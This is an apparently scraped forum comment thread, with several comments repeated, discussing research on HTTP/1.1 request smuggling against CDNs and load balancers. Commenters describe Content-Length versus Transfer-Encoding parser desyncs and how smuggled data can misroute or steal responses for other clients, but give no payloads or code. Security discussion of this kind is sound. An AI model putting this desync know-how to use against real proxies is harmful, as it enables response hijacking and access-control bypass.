> Hi, I’m the author of this research. It’s great to see interest and I can promise some quality research and a strong argument to kill HTTP/1.1 but the headline of this article goes a bit too far. The specific CDN vulnerabilities have been disclosed to the vendors and patched (hence the past tense in the abstract) – I wouldn’t drop zero day on a CDN!
From the comment section. In other words, click-bait title.
sam_lowry_ · 3h ago
Killing HTTP/1.1 is killing the open web, because HTTP/2 and HTTP/3 depend on CA infrastructure.
bullen · 2h ago
I think I figured out a way to do secure registration with a MITM without certificates, so there might be a way out from this mess.
But still you need to transfer the client and check it's hash for it to work and that's hard to implement in practice.
But you could bootstrap the thing over HTTPS (the download of the client) and then not need it ever again which is neat. Specially if you use TCP/HTTP now.
Tohsig · 2h ago
Appreciate you pointing that out. HTTP/1.1 may be relatively long in tooth, but this particular vulnerability seems straightforward to mitigate to me. Especially at the CDN level.
Forgive my optimism here but this seems overblown and trivial to detect and reject in firewalls/cdns.
Cloudflare most recently blocked a vulnerability affecting some php websites where a zip file upload contains a reverse shell. This seems plain in comparison (probably because it is).
This sensationalist headline, that doomsday style clock (as another poster shared) makes me question the motives of these researchers. Have they shorted any CDN stocks?
Retr0id · 3h ago
The underlying flaw is a parser differential. To detect that generically you'd need a model of both(/all) parsers involved, and to detect when they diverge. This is non-trivial.
You can have the CDN normalize requests so that it always outputs wellformed requests. This way only one parser deals with an untrusted / ambiguous input.
No comments yet
Kinrany · 3h ago
"Stop working" here apparently means scheduled release of an exploit of a vulnerability in proxies that do access control and incorrectly handle combinations of headers Content-Length and Transfer-Encoding: chunked.
Retr0id · 3h ago
> incorrectly handle combinations of headers Content-Length and Transfer-Encoding: chunked.
I think the article uses this as an example of the concept of Request Smuggling in general. This broad approach has been known for a long time. I assume the new research uses conceptually similar but concretely different approaches to trigger parser desyncs.
joshstrange · 3h ago
I might just be stupid but I'm not quite seeing the full issue I think.
From my reading this is a problem if:
1. Your CDN/Load balancer allows for HTTP/1.1 connections
2. You do some filtering/firewalling/auth/etc at your CDN/Load balancer for specific endpoints
I'm sure it's more than that, and I'm just missing it.
If you do all your filtering/auth/etc on your backend servers this doesn't matter right? Obviously people DO filtering/auth/etc at the edge so they would be affected but 1/3rd seems high. Maybe 1/3rd of traffic is HTTP/1.1 but they would also have to be doing filtering/auth at the edge to be hit by this right?
Again, for the 3rd time, I'm probably missing something, just trying to better understand the issue.
mhitza · 3h ago
If it's similar to a vulnerability reported a couple of years back, the gist of it would be.
Some load balancers fronting multiple application connection through multiplexed requests on a single HTTP 1.1 connection, and bugs occur with the handling (generally handling request boundaries).
For example you can have a HTTP 1.1 front connection that behind the scenes operates a separate HTTP 1.0, 1.1, 2 or 3 connection.
When smuggling additional data through the request you trip up the handler at the load balancer handler to inject a response that shouldn't be there, which will be served for one of the clients (even the wrong client request).
Similar to HTTP response splitting attacks of the past.
Eg. 3 requests come into the load balancer, and request 2 smuggles in an extra response that could be served as a response to request 1 or 3.
This title is super misleading, it's not going to stop working, unless PortSwigger plans on using this to DDoS all HTTP/1.1 servers?
daedrdev · 3h ago
There are numerous HTTP header vulnerabilities that CDNs already fix and block, how is this different?
raver1975 · 4h ago
Doesn't compare to the mayhem and destruction we experienced during Y2K.
scoreandmore · 3h ago
I’m guessing you weren’t even born yet, because the industry started working on this in the early 1990s. Or do you still make jokes about the old lady and the hot McDonald’s coffee?
charcircuit · 4h ago
Is it really impossible for the CDNs to mitigate the vulnerability without disabling the site altogether? I'm skeptical that is the case. I'm sure there is a way to properly separate different requests.
From the comment section. In other words, click-bait title.
But still you need to transfer the client and check it's hash for it to work and that's hard to implement in practice.
But you could bootstrap the thing over HTTPS (the download of the client) and then not need it ever again which is neat. Specially if you use TCP/HTTP now.
Following through the links referenced in the article, this appears to be the actual underlying research: https://portswigger.net/research/http-desync-attacks-request...
Cloudflare most recently blocked a vulnerability affecting some php websites where a zip file upload contains a reverse shell. This seems plain in comparison (probably because it is).
This sensationalist headline, that doomsday style clock (as another poster shared) makes me question the motives of these researchers. Have they shorted any CDN stocks?
https://github.com/narfindustries/http-garden
No comments yet
I think the article uses this as an example of the concept of Request Smuggling in general. This broad approach has been known for a long time. I assume the new research uses conceptually similar but concretely different approaches to trigger parser desyncs.
From my reading this is a problem if:
1. Your CDN/Load balancer allows for HTTP/1.1 connections
2. You do some filtering/firewalling/auth/etc at your CDN/Load balancer for specific endpoints
I'm sure it's more than that, and I'm just missing it.
If you do all your filtering/auth/etc on your backend servers this doesn't matter right? Obviously people DO filtering/auth/etc at the edge so they would be affected but 1/3rd seems high. Maybe 1/3rd of traffic is HTTP/1.1 but they would also have to be doing filtering/auth at the edge to be hit by this right?
Again, for the 3rd time, I'm probably missing something, just trying to better understand the issue.
Some load balancers fronting multiple application connection through multiplexed requests on a single HTTP 1.1 connection, and bugs occur with the handling (generally handling request boundaries).
For example you can have a HTTP 1.1 front connection that behind the scenes operates a separate HTTP 1.0, 1.1, 2 or 3 connection.
When smuggling additional data through the request you trip up the handler at the load balancer handler to inject a response that shouldn't be there, which will be served for one of the clients (even the wrong client request).
Similar to HTTP response splitting attacks of the past.
Eg. 3 requests come into the load balancer, and request 2 smuggles in an extra response that could be served as a response to request 1 or 3.
That's how I understood the last such attack.
See https://youtu.be/aKPAX00ft5s?feature=shared&t=8730 for a relevant demo.
You can also (in principle) steal responses intended for other clients, and control responses that get delivered to other clients.
So, I can't tell if it's real(ish) or advertising.
[0]: https://flak.tedunangst.com/post/polarizing-parsers